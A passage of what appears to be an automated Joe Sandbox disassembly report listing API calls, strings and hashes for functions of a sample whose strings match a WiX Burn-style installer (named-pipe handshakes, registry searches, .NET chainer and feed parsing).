Instruction Fuzzy Hash: 6BD1B470A4035ABBEB119FA6CC85FEF7EB8BF14355F10002AF600A2191D7B99944DB59

Function 004D54DC Relevance: 52.7, APIs: 17, Strings: 13, Instructions: 229filepipesleepCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,0050B500,?,00000000,?,004C452F,?,0050B500), ref: 004D54FD
GetCurrentProcessId.KERNEL32(?,004C452F,?,0050B500), ref: 004D5508
SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,004C452F,?,0050B500), ref: 004D553F
ConnectNamedPipe.KERNEL32(?,00000000,?,004C452F,?,0050B500), ref: 004D5554
GetLastError.KERNEL32(?,004C452F,?,0050B500), ref: 004D555E
Sleep.KERNEL32(00000064,?,004C452F,?,0050B500), ref: 004D5593
SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,004C452F,?,0050B500), ref: 004D55B6
WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,004C452F,?,0050B500), ref: 004D55D1
WriteFile.KERNEL32(?,/EL,0050B500,00000000,00000000,?,004C452F,?,0050B500), ref: 004D55EC
WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,004C452F,?,0050B500), ref: 004D5607
ReadFile.KERNEL32(?,wininet.dll,00000004,feclient.dll,00000000,?,004C452F,?,0050B500), ref: 004D5622
GetLastError.KERNEL32(?,004C452F,?,0050B500), ref: 004D567D
GetLastError.KERNEL32(?,004C452F,?,0050B500), ref: 004D56B1
GetLastError.KERNEL32(?,004C452F,?,0050B500), ref: 004D56E5
GetLastError.KERNEL32(?,004C452F,?,0050B500), ref: 004D5719
GetLastError.KERNEL32(?,004C452F,?,0050B500), ref: 004D574A
GetLastError.KERNEL32(?,004C452F,?,0050B500), ref: 004D577B

Strings

Failed to write secret length to pipe., xrefs: 004D5743
Failed to read ACK from pipe., xrefs: 004D56A7
crypt32.dll, xrefs: 004D55CF
feclient.dll, xrefs: 004D55FF, 004D561A
Failed to write secret to pipe., xrefs: 004D570F
Failed to write our process id to pipe., xrefs: 004D56DB
pipe.cpp, xrefs: 004D5669, 004D569D, 004D56D1, 004D5705, 004D5739, 004D576A, 004D579B
Failed to wait for child to connect to pipe., xrefs: 004D5673
/EL, xrefs: 004D55E8
wininet.dll, xrefs: 004D5620
comres.dll, xrefs: 004D5605
Failed to reset pipe to blocking., xrefs: 004D5774
Failed to set pipe to non-blocking., xrefs: 004D57A5

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
String ID: /EL$Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$comres.dll$crypt32.dll$feclient.dll$pipe.cpp$wininet.dll
API String ID: 2944378912-2875840801
Opcode ID: 38faf10a0664323d2c645d49ea4c02781c373d7ec23da101378c960e944f200d
Instruction ID: 74fa39c7dd205c25a771c3213cfbbee7c0e1a1b3cbfe1dd0a321164ed4c67e20
Opcode Fuzzy Hash: 38faf10a0664323d2c645d49ea4c02781c373d7ec23da101378c960e944f200d
Instruction Fuzzy Hash: 2271ED77D81635B7E7209BA58C55FAE69A8AF14B10F214127FD04FB380DB78CD408AE9

Function 004ED43E Relevance: 49.3, APIs: 12, Strings: 16, Instructions: 290synchronizationprocessCOMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 004ED4B3
StringFromGUID2.OLE32(?,?,00000027), ref: 004ED4DC
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 004ED5C5
GetLastError.KERNEL32(?,?,?,?), ref: 004ED5CF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 004ED668
WaitForSingleObject.KERNEL32(0050B500,000000FF,?,?,?,?), ref: 004ED673
ReleaseMutex.KERNEL32(0050B500,?,?,?,?), ref: 004ED69D
GetExitCodeProcess.KERNEL32(?,?), ref: 004ED6BE
GetLastError.KERNEL32(?,?,?,?), ref: 004ED6CC
GetLastError.KERNEL32(?,?,?,?), ref: 004ED704

Part of subcall function 004ED33E: WaitForSingleObject.KERNEL32(?,000000FF,755730B0,00000000,?,?,?,?,004ED642,?), ref: 004ED357
Part of subcall function 004ED33E: ReleaseMutex.KERNEL32(?,?,?,?,004ED642,?), ref: 004ED375
Part of subcall function 004ED33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004ED3B6
Part of subcall function 004ED33E: ReleaseMutex.KERNEL32(?), ref: 004ED3CD
Part of subcall function 004ED33E: SetEvent.KERNEL32(?), ref: 004ED3D6

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 004ED7B9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 004ED7D1

Strings

Failed to CreateProcess on path: %ls, xrefs: 004ED5FE
NetFxEvent.%ls, xrefs: 004ED52B
Failed to get netfx return code., xrefs: 004ED6FA
NetFxSection.%ls, xrefs: 004ED509
Failed to create netfx chainer guid., xrefs: 004ED4C0
D$N, xrefs: 004ED46D
Failed to convert netfx chainer guid into string., xrefs: 004ED4FB
Failed to process netfx chainer message., xrefs: 004ED648
NetFxChainer.cpp, xrefs: 004ED4F1, 004ED5F3, 004ED6F0, 004ED728
Failed to allocate event name., xrefs: 004ED53F
Failed to allocate section name., xrefs: 004ED51D
D, xrefs: 004ED5AA
Failed to create netfx chainer., xrefs: 004ED55E
%ls /pipe %ls, xrefs: 004ED57F
Failed to wait for netfx chainer process to complete, xrefs: 004ED732
Failed to allocate netfx chainer arguments., xrefs: 004ED593

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
String ID: %ls /pipe %ls$D$D$N$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
API String ID: 1533322865-3086769737
Opcode ID: 909fbd9ad7fdf695274a44868219732a4e9e278b9feb3f6104343b957ff139de
Instruction ID: 517e94d299b6517da7406d5d6d815c4ece5eaa2bf62bee96b6da0c9e77ef4cb2
Opcode Fuzzy Hash: 909fbd9ad7fdf695274a44868219732a4e9e278b9feb3f6104343b957ff139de
Instruction Fuzzy Hash: 5FA1B276D00269ABEF209FA5CC45BAEBBB4BF14311F10416AF908F7292D7389D448F95

Function 0050744A Relevance: 47.6, APIs: 13, Strings: 14, Instructions: 340COMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 0050755D
SysFreeString.OLEAUT32(00000000), ref: 00507726
SysFreeString.OLEAUT32(00000000), ref: 005077C3

Strings

entry, xrefs: 005074D5, 0050769E
`5w, xrefs: 00507726, 005077C3
logo, xrefs: 005075B0
(, xrefs: 00507701
author, xrefs: 0050749B, 0050762C
updated, xrefs: 00507604
subtitle, xrefs: 005075CC
@, xrefs: 005076CC
atomutil.cpp, xrefs: 00507477, 005077AD
title, xrefs: 005075E8
generator, xrefs: 00507550
category, xrefs: 005074B8, 00507665
link, xrefs: 005074F2, 005076D4
icon, xrefs: 00507574

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$FreeHeap$AllocateCompareProcess
String ID: ($@$`5w$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
API String ID: 1555028553-3316252067
Opcode ID: eef336f6a5bcf4acdab27dab97d541bf395e20e096ae7244f4723edc06c3c3e0
Instruction ID: 36cab6a4e570ff2bac141e447583af29e3cfeb45ffe9316ea763cff1e592c294
Opcode Fuzzy Hash: eef336f6a5bcf4acdab27dab97d541bf395e20e096ae7244f4723edc06c3c3e0
Instruction Fuzzy Hash: 38B15C35D4862ABBDB219BA4CC81FAE7E64FF09760F200755F621A61D1D770FA10DBA0

Function 0050710D Relevance: 47.5, APIs: 11, Strings: 16, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00523E78,000000FF,?,?,?), ref: 005071D4
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 005071F9
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00507219
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00507235
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 0050725D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00507279
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 005072B2
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 005072EB

Part of subcall function 00506D50: SysFreeString.OLEAUT32(00000000), ref: 00506E89
Part of subcall function 00506D50: SysFreeString.OLEAUT32(00000000), ref: 00506EC8

SysFreeString.OLEAUT32(00000000), ref: 0050736F
SysFreeString.OLEAUT32(00000000), ref: 0050741F

Strings

cabinet.dll, xrefs: 00507150
`5w, xrefs: 0050736F, 0050741F
author, xrefs: 00507138, 0050726B
updated, xrefs: 0050724F
content, xrefs: 005072DD
feclient.dll, xrefs: 00507206
clbcatq.dll, xrefs: 00507242
atomutil.cpp, xrefs: 0050740C
title, xrefs: 0050720B
category, xrefs: 00507155, 005072A4
(, xrefs: 0050734A
published, xrefs: 00507227
summary, xrefs: 005071EB
msi.dll, xrefs: 00507137
link, xrefs: 00507172, 0050731D
version.dll, xrefs: 00507133

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$Compare$Free
String ID: ($`5w$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
API String ID: 318886736-2423559989
Opcode ID: d2ef51545bc15597848accd8966ef20eeda937f82a7700a533b869cf357f022c
Instruction ID: f36a4d4d2a505192796deab023a510dd480111502098341403d6c1cd037fdc8e
Opcode Fuzzy Hash: d2ef51545bc15597848accd8966ef20eeda937f82a7700a533b869cf357f022c
Instruction Fuzzy Hash: 76A18E31D4822AFBDB219B94CC41FAEBE64BF08720F244755F921A61D1DB70FA50DB91

Function 004CA416 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004CA45A
_MREFOpen@16.MSPDB140-MSVCRT ref: 004CA480
RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 004CA768

Strings

Registry value not found. Key = '%ls', Value = '%ls', xrefs: 004CA51C
Failed to change value type., xrefs: 004CA70F
Failed to allocate memory registry value., xrefs: 004CA587
Failed to query registry key value., xrefs: 004CA5DA
Failed to clear variable., xrefs: 004CA4D8
Failed to query registry key value size., xrefs: 004CA554
Failed to read registry value., xrefs: 004CA6F6
Unsupported registry key value type. Type = '%u', xrefs: 004CA608
Registry key not found. Key = '%ls', xrefs: 004CA4B4
Failed to format value string., xrefs: 004CA48B
Failed to open registry key., xrefs: 004CA4ED
Failed to set variable., xrefs: 004CA72B
Failed to get expand environment string., xrefs: 004CA6DD
RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 004CA740
search.cpp, xrefs: 004CA54A, 004CA57D, 004CA5D0, 004CA6D3
Failed to format key string., xrefs: 004CA465
Failed to allocate string buffer., xrefs: 004CA667

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Open@16$Close
String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
API String ID: 2348241696-3124384294
Opcode ID: 3d40f49cd434667057fc14f0e839067a9990dbe7d29b1b6b4c2cd6d95e74c192
Instruction ID: 84ad679db092f0847afd0e5eba81033272c16cfc2136e680ea1d39423be60f68
Opcode Fuzzy Hash: 3d40f49cd434667057fc14f0e839067a9990dbe7d29b1b6b4c2cd6d95e74c192
Instruction Fuzzy Hash: FFA1393AD0112DB7CB519AA4CC4AFAEBA74BF04714F14852BF900B6290D779DD209BDA

Function 004C5770 Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 479stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,004CA8B4,00000100,000002C0,000002C0,00000100), ref: 004C5795
lstrlenW.KERNEL32(000002C0,?,004CA8B4,00000100,000002C0,000002C0,00000100), ref: 004C579F
_wcschr.LIBVCRUNTIME ref: 004C59A7
LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,004CA8B4,00000100,000002C0,000002C0,00000100), ref: 004C5C4A

Strings

Failed to set record format string., xrefs: 004C5AD4
Failed to format placeholder string., xrefs: 004C5A57
*****, xrefs: 004C5913
variable.cpp, xrefs: 004C59FE, 004C5A1F, 004C5A78, 004C5ACA, 004C5B56, 004C5B88, 004C5C04
Failed to get variable name., xrefs: 004C5A8C
Failed to append string., xrefs: 004C581B
Failed to allocate string., xrefs: 004C5BC1
[%d], xrefs: 004C5962
Failed to allocate variable array., xrefs: 004C5A85
Failed to allocate record., xrefs: 004C5A0B
Failed to format record., xrefs: 004C5C0E
Failed to copy string., xrefs: 004C5C2E
Failed to reallocate variable array., xrefs: 004C5A2C
Failed to set variable value., xrefs: 004C5A61
Failed to append placeholder., xrefs: 004C5A4D
Failed to get formatted length., xrefs: 004C5B92
Failed to determine variable visibility: '%ls'., xrefs: 004C5A3A
Failed to set record string., xrefs: 004C5B60
Failed to allocate buffer for format string., xrefs: 004C57BD

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave_wcschrlstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 1026845265-2050445661
Opcode ID: 8728187f71944aef3ec8290e95fc647e7d9986e0c4d0fd8b92f7fe74b388c40d
Instruction ID: b30cb4e915413708129cc6847352963006169302e0e8208808e4ec0424d5fb7a
Opcode Fuzzy Hash: 8728187f71944aef3ec8290e95fc647e7d9986e0c4d0fd8b92f7fe74b388c40d
Instruction Fuzzy Hash: ABF1A579901615EBDB50DFA58841FBF7EB4BB04B10F10812FFD04AB280D779AE418BA9

Function 004ECE81 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 240synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,004ED558,?,?,?), ref: 004ECEC7
GetLastError.KERNEL32(?,?,004ED558,?,?,?), ref: 004ECED4
ReleaseMutex.KERNEL32(?), ref: 004ED13C

Strings

failed to allocate memory for mutex name, xrefs: 004ECF89
%ls_send, xrefs: 004ECF06
Failed to create event: %ls, xrefs: 004ECF67
failed to allocate memory for event name, xrefs: 004ECF1A
Failed to memory map cabinet file: %ls, xrefs: 004ED028
Failed to allocate memory for NetFxChainer struct., xrefs: 004ECEAD
Failed to MapViewOfFile for %ls., xrefs: 004ED070
%ls_mutex, xrefs: 004ECF75
failed to copy event name to shared memory structure., xrefs: 004ED09A
NetFxChainer.cpp, xrefs: 004ECEA3, 004ECEF5, 004ECF5A, 004ECFC9, 004ED01B, 004ED063
Failed to create mutex: %ls, xrefs: 004ECFD6

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
API String ID: 3944734951-2991465304
Opcode ID: 91aca9ea2bb32a1d27e4a75bfb1e9e62d117e05ba726f43a4f40eae946844df7
Instruction ID: a1836eecb0225ab921c5c69b5b999e558cd11eaf75ca56fcdaf3b55ddd6843ee
Opcode Fuzzy Hash: 91aca9ea2bb32a1d27e4a75bfb1e9e62d117e05ba726f43a4f40eae946844df7
Instruction Fuzzy Hash: AA81247AA41372BBD7219B668C49F5BBEA4BF05721F11411AFD04AB3C1D738DD008AE8

Function 004CEA42 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON

Download Yara Rule

APIs

Part of subcall function 005032F3: VariantInit.OLEAUT32(?), ref: 00503309
Part of subcall function 005032F3: SysAllocString.OLEAUT32(?), ref: 00503325
Part of subcall function 005032F3: VariantClear.OLEAUT32(?), ref: 005033AC
Part of subcall function 005032F3: SysFreeString.OLEAUT32(00000000), ref: 005033B7

CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,0050CA9C,?,?,Action,?,?,?,00000000,?), ref: 004CEB13
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 004CEB5D

Strings

cabinet.dll, xrefs: 004CEBBA
Invalid value for @Action: %ls, xrefs: 004CEC52
Failed to get RelatedBundle element count., xrefs: 004CEA97
Failed to resize Detect code array in registration, xrefs: 004CEC2E
Failed to get @Action., xrefs: 004CEC69
Failed to resize Addon code array in registration, xrefs: 004CEC3C
Failed to resize Upgrade code array in registration, xrefs: 004CEC35
Action, xrefs: 004CEAD0
Failed to get @Id., xrefs: 004CEC62
Failed to get RelatedBundle nodes, xrefs: 004CEA72
Failed to resize Patch code array in registration, xrefs: 004CEC43
Failed to get next RelatedBundle element., xrefs: 004CEC70
RelatedBundle, xrefs: 004CEA50
Addon, xrefs: 004CEB9A
Detect, xrefs: 004CEB04
comres.dll, xrefs: 004CEB26
Patch, xrefs: 004CEBDD
version.dll, xrefs: 004CEB70
Upgrade, xrefs: 004CEB50

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$CompareVariant$AllocClearFreeInit
String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
API String ID: 702752599-259800149
Opcode ID: ff0f43b9feeabb9812dcf633cdc91376a5ab9966732548f9daafa8d4b36d976f
Instruction ID: b96d485006525939db92178e2d226d0fc64e6d98b8c7c3564c1eb4fa54a44564
Opcode Fuzzy Hash: ff0f43b9feeabb9812dcf633cdc91376a5ab9966732548f9daafa8d4b36d976f
Instruction Fuzzy Hash: DD71BF79904616BFDB20CB91C945FAEBBB4FF05720F20425AFA11A72C1D735AE42CB94

Function 004D46DC Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 185fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,004D4BF5,0050B4E8,?,feclient.dll,00000000,?,?), ref: 004D46F3
ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,004D4BF5,0050B4E8,?,feclient.dll,00000000,?,?), ref: 004D4714
GetLastError.KERNEL32(?,004D4BF5,0050B4E8,?,feclient.dll,00000000,?,?), ref: 004D471A
ReadFile.KERNEL32(feclient.dll,00000000,0050B518,?,00000000,00000000,0050B519,?,004D4BF5,0050B4E8,?,feclient.dll,00000000,?,?), ref: 004D47A8
GetLastError.KERNEL32(?,004D4BF5,0050B4E8,?,feclient.dll,00000000,?,?), ref: 004D47AE

Strings

pipe.cpp, xrefs: 004D473E, 004D4769, 004D47D2, 004D480A, 004D4857, 004D48B1, 004D48F1
Verification secret from parent does not match., xrefs: 004D4816
Failed to read verification process id from parent pipe., xrefs: 004D4861
Failed to read verification secret from parent pipe., xrefs: 004D47DC
msasn1.dll, xrefs: 004D482B
feclient.dll, xrefs: 004D46E2, 004D4712, 004D4713, 004D47A7, 004D482C, 004D4882
Failed to read size of verification secret from parent pipe., xrefs: 004D4748
Failed to allocate buffer for verification secret., xrefs: 004D4791
Verification process id from parent does not match., xrefs: 004D48FD
Verification secret from parent is too big., xrefs: 004D4775
Failed to inform parent process that child is running., xrefs: 004D48BB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastRead$CurrentProcess
String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
API String ID: 1233551569-452622383
Opcode ID: 6c27f265e6dc80a80cb38dad5d2fa0374f73915349cf87736ffc226231e0c11c
Instruction ID: ca0bfa9ababa04add039d1f485a84b4390c1d5edf0cb0bf74035e8bfb3482a4a
Opcode Fuzzy Hash: 6c27f265e6dc80a80cb38dad5d2fa0374f73915349cf87736ffc226231e0c11c
Instruction Fuzzy Hash: 6851ED3AD80266B7E721AB954C56FBF7A68BB41B50F11012BFE10BB380D7788D4096E5

Function 004E27FC Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON

Download Yara Rule

Strings

none, xrefs: 004E2936
Failed to get @RepairArguments., xrefs: 004E288B
Failed to get @InstallArguments., xrefs: 004E2847
Failed to get @DetectCondition., xrefs: 004E2825
RepairArguments, xrefs: 004E287A
Repairable, xrefs: 004E289C
Failed to get @UninstallArguments., xrefs: 004E2869
Protocol, xrefs: 004E28C3
Failed to get @Repairable., xrefs: 004E28B5
DetectCondition, xrefs: 004E2814
Failed to get @Protocol., xrefs: 004E2974
burn, xrefs: 004E28E0
Failed to parse command lines., xrefs: 004E2988
UninstallArguments, xrefs: 004E2858
netfx4, xrefs: 004E2915
Invalid protocol type: %ls, xrefs: 004E295C
Failed to parse exit codes., xrefs: 004E290C
InstallArguments, xrefs: 004E2836

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

